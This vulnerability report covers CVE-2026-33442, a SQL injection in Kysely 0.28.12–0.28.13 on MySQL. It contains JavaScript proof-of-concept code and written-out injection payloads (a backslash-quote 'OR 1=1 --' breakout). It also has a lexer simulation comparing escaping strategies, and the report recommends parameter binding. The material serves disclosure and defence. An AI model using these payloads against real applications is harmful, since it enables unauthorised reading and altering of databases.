Security Vulnerability Report
CVE-2026-33442 CVSS 8.1 HIGH

CVE-2026-33442

Published: 2026-03-26 17:16:41
Last Modified: 2026-03-31 21:27:05

Description

Kysely is a type-safe TypeScript SQL query builder. In versions 0.28.12 and 0.28.13, the `sanitizeStringLiteral` method in Kysely's query compiler escapes single quotes (`'` → `''`) but does not escape backslashes. On MySQL with backslash escaping enabled for string literals (the server default, which the description's `BACKSLASH_ESCAPES` wording refers to; it is disabled only by the `NO_BACKSLASH_ESCAPES` SQL mode), an attacker can place a backslash before a single quote so that the backslash consumes the first of the two doubled quotes, neutralizing the escaping, breaking out of the JSON path string literal and injecting arbitrary SQL. Version 0.28.14 fixes the issue; the affected range recorded below is 0.28.12 up to, but excluding, 0.28.14.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:kysely:kysely:*:*:*:*:*:node.js:*:* - VULNERABLE
Kysely 0.28.12
Kysely 0.28.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// Conceptual PoC for CVE-2026-33442: bypassing sanitizeStringLiteral
// Kysely 0.28.12/0.28.13 logic: escapes single quotes only, never backslashes
function vulnerableSanitize(str) {
  return str.replace(/'/g, "''");
}

// Attacker payload: a backslash followed by a single quote. The trailing space
// matters: MySQL only treats "--" as a comment when whitespace follows it, so
// "-- " followed by the template's closing quote comments that quote out.
const userInput = "\\' OR 1=1 -- ";

// The query construction (string interpolation, as the vulnerable compiler does
// for the JSON path literal; a WHERE clause is used here to keep the PoC short)
const query = `SELECT * FROM users WHERE name = '${vulnerableSanitize(userInput)}'`;

console.log("Generated SQL:", query);
// Output: SELECT * FROM users WHERE name = '\'' OR 1=1 -- '

/* Analysis in MySQL with backslash escapes enabled (the default):
   1. The string literal starts at the first quote.
   2. The parser encounters the backslash \ .
   3. The backslash escapes the single quote that follows it, so that quote is
      data, not a delimiter; the doubling added by the sanitizer is defeated.
   4. The next quote therefore closes the literal, whose value is a lone ' .
   5. The remaining  OR 1=1 -- ' is parsed as SQL, with -- commenting out the
      template's closing quote.
   Result: SQL injection successful. */
```
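The PoC above uses a plain WHERE clause; the description says the real injection point is a JSON path literal, and it depends on the server's backslash mode. The following is an added example written for this report, not Kysely's code and not the 0.28.14 patch: it puts the quote-only escaper into an assumed `JSON_EXTRACT(data, '$.<key>')` template, scans the resulting SQL the way MySQL's lexer delimits a single-quoted literal, and compares the outcome with backslash escaping on and off, and against an illustrative escaper that also doubles backslashes. The function names, the template, the hardened escaper and the sample keys are all constructed for illustration.

```javascript
// Added example for CVE-2026-33442 (not Kysely's code, not the 0.28.14 fix).
// Function names, the JSON_EXTRACT template, the hardened escaper and the
// sample keys are constructed for illustration.

// Quote-only escaping, the behaviour described for Kysely 0.28.12/0.28.13.
function quoteOnlyEscape(str) {
  return str.replace(/'/g, "''");
}

// Illustrative hardening (an assumption, not the actual patch): escape the
// escape character first, then double the quote, so a backslash can no longer
// pair with the first of the doubled quotes.
function backslashAndQuoteEscape(str) {
  return str.replace(/\\/g, "\\\\").replace(/'/g, "''");
}

// Scan a MySQL single-quoted literal that opens at sql[start] and return the
// index just past its closing quote, following MySQL's lexing rules:
//   - '' inside a literal is a literal quote, not a terminator;
//   - with backslashEscapes true (server default), \x is an escape sequence and
//     the escaped character never terminates the literal;
//   - with backslashEscapes false (NO_BACKSLASH_ESCAPES), backslash is ordinary.
// Returns -1 when the literal is never closed (MySQL would raise a syntax error).
function scanLiteral(sql, start, backslashEscapes) {
  if (sql[start] !== "'") throw new Error("start must point at an opening quote");
  let i = start + 1;
  while (i < sql.length) {
    const ch = sql[i];
    if (ch === "\\" && backslashEscapes) { i += 2; continue; }
    if (ch === "'") {
      if (sql[i + 1] === "'") { i += 2; continue; }
      return i + 1;
    }
    i += 1;
  }
  return -1;
}

// Interpolate an attacker-controlled JSON key into a path literal, then report
// which text (if any) the parser would treat as SQL between where the literal
// really ends and the template's own closing quote. Empty "leaked" = no breakout.
function compileJsonPath(key, escapeFn, backslashEscapes) {
  const sql = `SELECT JSON_EXTRACT(data, '$.${escapeFn(key)}') FROM t`;
  const open = sql.indexOf("'");
  const templateClose = sql.lastIndexOf("'");
  const end = scanLiteral(sql, open, backslashEscapes);
  return {
    sql,
    unterminated: end === -1,
    leaked: end === -1 || end > templateClose ? "" : sql.slice(end, templateClose),
  };
}

// Constructed attacker key: backslash-quote breaks out of the literal and the
// trailing "-- " comments out the template's closing quote (MySQL requires
// whitespace after "--" for it to start a comment).
const attackerKey = "\\') OR 1=1 -- ";

function demo() {
  return {
    vulnerable:      compileJsonPath(attackerKey, quoteOnlyEscape, true),
    noBackslashMode: compileJsonPath(attackerKey, quoteOnlyEscape, false),
    hardened:        compileJsonPath(attackerKey, backslashAndQuoteEscape, true),
    benign:          compileJsonPath("user's name", quoteOnlyEscape, true),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Running `demo()` shows the mode dependence the description hints at: with backslash escaping on, the quote-only escaper leaks `) OR 1=1 -- ` into SQL position; under `NO_BACKSLASH_ESCAPES` the same input stays inside the literal. A key of just `\'` produces an unterminated literal rather than a breakout, which is the syntax-error variant a tester sees first. Note the caveat on the hardened escaper: under `NO_BACKSLASH_ESCAPES` its doubled backslashes are stored as data, so a client-side escaper has to know the server's mode, which is why binding the value as a parameter is the more robust fix than any literal escaping.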

References

https://github.com/kysely-org/kysely/security/advisories/GHSA-fr9j-6mvq-frcv (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33442", "sourceIdentifier": "[email protected]", "published": "2026-03-26T17:16:40.850", "lastModified": "2026-03-31T21:27:04.617", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kysely is a type-safe TypeScript SQL query builder. In versions 0.28.12 and 0.28.13, the `sanitizeStringLiteral` method in Kysely's query compiler escapes single quotes (`'` → `''`) but does not escape backslashes. On MySQL with the default `BACKSLASH_ESCAPES` SQL mode, an attacker can inject a backslash before a single quote to neutralize the escaping, breaking out of the JSON path string literal and injecting arbitrary SQL. Version 0.28.14 fixes the issue."}, {"lang": "es", "value": "Kysely es un constructor de consultas SQL de TypeScript con tipado seguro. En las versiones 0.28.12 y 0.28.13, el método `sanitizeStringLiteral` en el compilador de consultas de Kysely escapa las comillas simples (`'` ? `''`) pero no escapa las barras invertidas. En MySQL con el modo SQL predeterminado `BACKSLASH_ESCAPES`, un atacante puede inyectar una barra invertida antes de una comilla simple para neutralizar el escape, saliendo del literal de cadena de ruta JSON e inyectando SQL arbitrario. 
La versión 0.28.14 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kysely:kysely:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "0.28.12", "versionEndExcluding": "0.28.14", "matchCriteriaId": "2CD191E8-8EA7-43BA-B237-9C2091B32B93"}]}]}], "references": [{"url": "https://github.com/kysely-org/kysely/security/advisories/GHSA-fr9j-6mvq-frcv", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}